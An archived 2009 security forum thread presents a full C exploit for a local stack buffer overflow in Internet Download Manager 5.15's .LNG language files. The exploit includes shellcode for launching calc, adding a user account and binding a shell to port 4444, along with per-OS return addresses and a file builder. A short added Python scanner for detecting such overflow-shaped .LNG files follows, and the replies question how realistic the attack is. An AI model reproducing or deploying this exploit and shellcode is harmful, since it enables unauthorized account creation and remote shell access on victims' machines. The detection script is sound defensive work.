Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
 Post subject: Internet Download Manager 5.15
PostPosted: 01 Mar 2009 21:30 

Joined: 03 Feb 2009 01:40
Posts: 31
Mmmm, here is a good one for IDM.
Demo video
http://rapidshare.com/files/204135482/idm.avi.html
Code:
/*
-----------------------------------
Internet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit

Corruption starts at stack address 0x0012E0B4
SEH CHAINS

SEH_1
address_1  0012EE8C -STATUS: clean

SEH_2

address_2  0012FF04 -STATUS: clean

SEH_3

address_3  0012FFB0 -STATUS: clean

EAX 0000002A
ECX 90909090  --controlled
EDX 7C90E4F4 ntdll.KiFastSystemCallRet
EBX 0012EEAC
ESP 0012E584 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 90909090  --controlled
ESI 0012FA6C
EDI 0012E784 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EIP 45595945  --controlled

CALL STACK --1

call stack  Call stack of main thread, item 3
Address=0012EE24 -> Possible return address
Procedure / arguments=  pMsg = IDMan.005C70D0


CALL STACK --2

Call stack of main thread, item 8
Address=0012EE60 -> Possible return address
Procedure / arguments=IDMan.00540FAD
Called from=IDMan.0053E281
Stack Dump=00000004 005C71E0 005C7178

Credits for finding the bug go to musashi, credits for programming the exploit go to fl0 fl0w.
Tested on Microsoft Windows XP SP3, compiled with Borland C++ 3.1.
-------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>



/* thanks to Metasploit for the shellcodes */
// LAUNCH CALC.EXE
char shellcode_1[] =
                  "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57"
"\x70\x63";

// ADD USER
char shellcode_2[] =
                                                                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                                                                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                                                                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                                                                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                                                                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                                                                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                                                                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                                                                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                                                                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                                                                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                                                                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                                                                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                                                                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                                                                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                                                                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                                                                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                                                                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                                                                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                                                                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                                                                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                                                                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                            "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";

// REVERSE CMD SHELL -> BIND PORT
// NOTE: as published in the post, this byte string is identical to shellcode_2 (ADD USER) above.
char shellcode_3[] =
                    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
                    "\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
                    "\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
                    "\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
                    "\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
                    "\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
                    "\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
                    "\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
                    "\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
                    "\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
                    "\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
                    "\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
                    "\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
                    "\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
                    "\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
                    "\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
                    "\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
                    "\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
                    "\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
                    "\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
                    "\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
                    "\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
                   
#define SIZE   10000
#define OFFSET 1186   /* distance from the start of the file to the saved return address */

struct Target {
    const char   *OS;
    unsigned int  EIP;
};

Target Retcodes[] = {
    { "Microsoft Windows Pro sp3 English:",       0x7C8369F0 }, /* call esp */
    { "Microsoft Windows Pro sp3 English:",       0x7C86467B }, /* jmp esp  */
    { "\t\t\t  UNIVERSAL_1:",                      0x1008E153 },
    { "\t\t\t  UNIVERSAL_2:",                      0x219FB9B  },
    { "Windows 2000 5.0.1.0 SP1 (IA32) English:", 0x69952208 }, /* jmp esp  */
    { "sss",                                      0x7C868667 },
};
#define NTARGETS (sizeof(Retcodes) / sizeof(Retcodes[0]))

/* .LNG header "lang=0x1f Türkçe\r\n20376=" followed by the start of the NOP sled.
   The array is not NUL-terminated, so it must be copied with sizeof(), never strlen(). */
unsigned char hh[] = {
    0x6C, 0x61, 0x6E, 0x67, 0x3D, 0x30, 0x78, 0x31, 0x66, 0x20, 0x54, 0xC3, 0xBC, 0x72, 0x6B, 0xC3,
    0xA7, 0x65, 0x0D, 0x0A, 0x32, 0x30, 0x33, 0x37, 0x36, 0x3D, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
};

class EXPLOIT {
public:
    void file(const char *filename, char *buff);
    void write(char *buffer, int shellc_type, int target);
    void print();
    void usage(const char *name);
    void target();
};

int main(int argc, char *argv[])
{
    EXPLOIT IDM;
    int tgt, shell;
    char *actbuff;

    /* three arguments are required: target, shell_type, filename
       (the original tested argc < 3 and then read argv[3]) */
    if (argc < 4) {
        system("cls");
        printf("***********************************************************************\n");
        IDM.print();
        IDM.usage(argv[0]);
        printf("\n\n");
        printf("\t\t\t\tTargets\n");
        IDM.target();
        printf("************************************************************************\n");
        exit(0);
    }

    tgt   = atoi(argv[1]);
    shell = atoi(argv[2]);
    if (tgt < 0 || (size_t)tgt >= NTARGETS || shell < 1 || shell > 3) {
        printf("Invalid target or shell_type\n");
        return 1;
    }

    actbuff = (char *)malloc(SIZE);
    if (actbuff == NULL) {
        printf("Out of memory\n");
        return 1;
    }
    IDM.write(actbuff, shell, tgt);
    IDM.file(argv[3], actbuff);   /* file() releases actbuff */
    IDM.print();
    printf("Loading ...");
    printf("File built successfully\n");

    return 0;
}

void EXPLOIT::target()
{
    for (size_t i = 0; i < NTARGETS; i++)
        printf("> %d %s <0x%.8x> \n", (int)i, Retcodes[i].OS, Retcodes[i].EIP);
}

void EXPLOIT::file(const char *filename, char *buff)
{
    FILE *f = fopen(filename, "wb");

    if (f == NULL) {
        printf("Error writing file\n");
        free(buff);
        exit(0);
    }
    fwrite(buff, 1, strlen(buff), f);
    fclose(f);
    free(buff);
}

void EXPLOIT::write(char *buffer, int shellc_type, int target)
{
    unsigned int offset = 0;
    unsigned int RET = Retcodes[target].EIP;
    const char *sc;

    switch (shellc_type) {
        case 1:  sc = shellcode_1; break;
        case 2:  sc = shellcode_2; break;
        default: sc = shellcode_3; break;
    }

    memset(buffer, 0x90, SIZE);                        /* NOP sled */
    memcpy(buffer, hh, sizeof(hh));                    /* .LNG header (no terminator) */
    offset = OFFSET;
    memcpy(buffer + offset, &RET, 4);  offset += 4;    /* overwrite saved return address */
    memset(buffer + offset, 0x90, 10); offset += 10;
    memcpy(buffer + offset, sc, strlen(sc)); offset += strlen(sc);
    buffer[offset] = 0x00;                             /* terminate so file() can use strlen() */
}

void EXPLOIT::usage(const char *K)
{
    printf("Usage is: %s [target] [shell_type] [filename].html\n", K);
    fputs(
        "\t\tRetaddress for your version of Windows\n"
        "\t\tShell_type is the type of shellcode you want to run\n"
        "\t\t\t *Press 1 To Run CALC.EXE\n"
        "\t\t\t *Press 2 To Add User\n"
        "\t\t\t *Press 3 To Bind Shell to Port 4444\n"
        "\t\tExample\n"
        "\t\t\tIDM.exe 0 3 file.txt\n"
    , stdout);
}

void EXPLOIT::print()
{
    fputs(
        "\t\tInternet Download Manager 5.15 Local .LNG Stack Buffer Overflow Exploit\n"
        "\t\tby fl0 fl0w\n"
        "\t\tContact: flo_flow_supremacy@yahoo.com\n"
        "\n", stdout);
}





Btw, all the versions have this bug.
Internet Download Manager 5.11 (2.3 MB)
Internet Download Manager 5.09 (2.3 MB)
Internet Download Manager 5.08 (2.2 MB)
Internet Download Manager 5.07 (2.2 MB)
Internet Download Manager 5.05 (2.0 MB)
Internet Download Manager 5.04 (2.0 MB)
Internet Download Manager 5.03 (1.9 MB)
Internet Download Manager 5.02 (1.9 MB)
Internet Download Manager 5.01
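An added detection check, not part of the post or of IDM itself: a scanner for the plain key=value .LNG format that flags the shape this exploit relies on (one entry whose value is long enough to reach the saved return address, or that carries raw non-text bytes instead of a UI string). The length threshold and the two sample files are assumptions constructed for the example.

```python
"""Scan an IDM-style .LNG language file for overflow-shaped entries.

Added example, not code from the post or from IDM.  The exploit above
writes a .LNG file whose "20376=" entry carries ~1186 bytes before the
saved return address is overwritten; a legitimate entry is a short
UI string.  The threshold and samples below are assumptions.
"""
from __future__ import annotations

MAX_VALUE_LEN = 512  # assumed upper bound for a legitimate UI string


def scan_lng(data: bytes, max_value_len: int = MAX_VALUE_LEN) -> list[dict]:
    """Return one finding per suspicious key=value line (empty list if clean)."""
    findings = []
    # bytes.splitlines() splits only on \n, \r and \r\n, matching the post's
    # header "lang=0x1f T\xc3\xbcrk\xc3\xa7e\r\n20376=..."
    for lineno, raw in enumerate(data.splitlines(), start=1):
        if b"=" not in raw:
            continue  # not a key=value entry
        key, value = raw.split(b"=", 1)
        reasons = []
        if len(value) > max_value_len:
            reasons.append(f"value length {len(value)} exceeds {max_value_len}")
        try:
            text = value.decode("utf-8")  # UTF-8 text such as "Türkçe" is fine
        except UnicodeDecodeError:
            reasons.append("value is not valid UTF-8 text")
            text = ""
        if any(ord(ch) < 0x20 and ch != "\t" for ch in text):
            reasons.append("value contains control characters")
        if reasons:
            findings.append({"line": lineno,
                             "key": key.decode("latin-1"),
                             "reasons": reasons})
    return findings


# Constructed samples: a benign file, and one shaped like the exploit's output
# (the post's header followed by a 1200-byte NOP sled instead of a string).
BENIGN_LNG = b"lang=0x1f T\xc3\xbcrk\xc3\xa7e\r\n20376=Download complete\r\n"
OVERFLOW_LNG = b"lang=0x1f T\xc3\xbcrk\xc3\xa7e\r\n20376=" + b"\x90" * 1200 + b"\r\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_LNG), ("overflow", OVERFLOW_LNG)):
        hits = scan_lng(blob) or [{"line": "-", "key": "-", "reasons": ["clean"]}]
        for hit in hits:
            print(f"{name}: line {hit['line']} key {hit['key']}: {', '.join(hit['reasons'])}")
```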


 Post subject: Re: Internet Download Manager 5.15
PostPosted: 02 Mar 2009 01:26 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Isn't LNG a type of file usually used for the alternative languages?
If this is the case, the attack scenario is not very realistic, moreover because the language files are official ones on the IDM website.


 Post subject: Re: Internet Download Manager 5.15
PostPosted: 02 Mar 2009 15:19 

Joined: 03 Feb 2009 01:40
Posts: 31
Mmmm, I think you're right; even if you make an HTML page that would launch IDM upon download, the user would still have to have the LNG file in his local directory.

